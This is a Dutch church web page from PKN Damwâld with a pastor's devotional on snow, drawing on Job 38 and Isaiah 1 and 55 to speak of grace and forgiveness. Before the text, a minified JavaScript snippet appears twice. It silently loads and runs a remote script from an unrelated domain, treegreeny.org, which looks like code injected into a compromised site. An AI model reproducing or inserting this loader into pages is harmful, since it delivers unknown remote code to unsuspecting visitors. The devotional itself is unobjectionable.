;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Sneeuw - PKN Damwâld

Sneeuw

Gepubliceerd op: vrijdag 12 februari 2021

In de afgelopen week konden we eindelijk genieten van wat ander nieuws dan corona. De sneeuw maakte een mooie onderbreking in de zwaarte van deze tijd. Verschillende Bijbelteksten noemen
sneeuw. Ik haal er een paar uit: In Job 38 vers 22 lezen we hoe God aan Job de vraag stelt: “Ken je de voorraadkamers van de sneeuw, heb je de voorraadkamers van de hagel gezien?”. Job dacht wel te weten waarom hem zo veel verdriet trof. Hij dacht dat hij God wel begreep en de Here vraagt of Job echt wel alles snapt. Sommige mensen sluiten God gemakkelijk uit hun leven. Ze denken dat ze alles wel begrijpen en vooral God. Is dat werkelijk zo? Leven we niet van genade?
In Jesaja 1 vers 18: De HEER zegt: Laten we zien wie er in zijn recht staat. Al zijn je zonden rood als scharlaken, ze worden wit als sneeuw, al zijn ze rood als purper, ze worden wit als wol. Sneeuw is hier een beeld voor de vergeving van de Here. Onverdiend maakt Hij ons leven rein. Gods weg begrijpen we maar ten dele. Toch werkt Hij in genade door en voltooid Zijn plannen. “Zoals regen of sneeuw neerdaalt uit de hemelen en daarheen niet terugkeert zonder eerst de aarde te doordrenken, haar te bevruchten en te laten gedijen, zodat er zaad is om te zaaien en brood om te eten – zo geldt dit ook voor het woord dat voortkomt uit Mijn mond: het keert niet vruchteloos naar Mij terug, niet zonder eerst te doen wat Ik wil en te volbrengen wat Ik gebied” [Jesaja 55 vers 10]. God is getrouw, Zijn plannen falen niet.

Ds. G.J Otter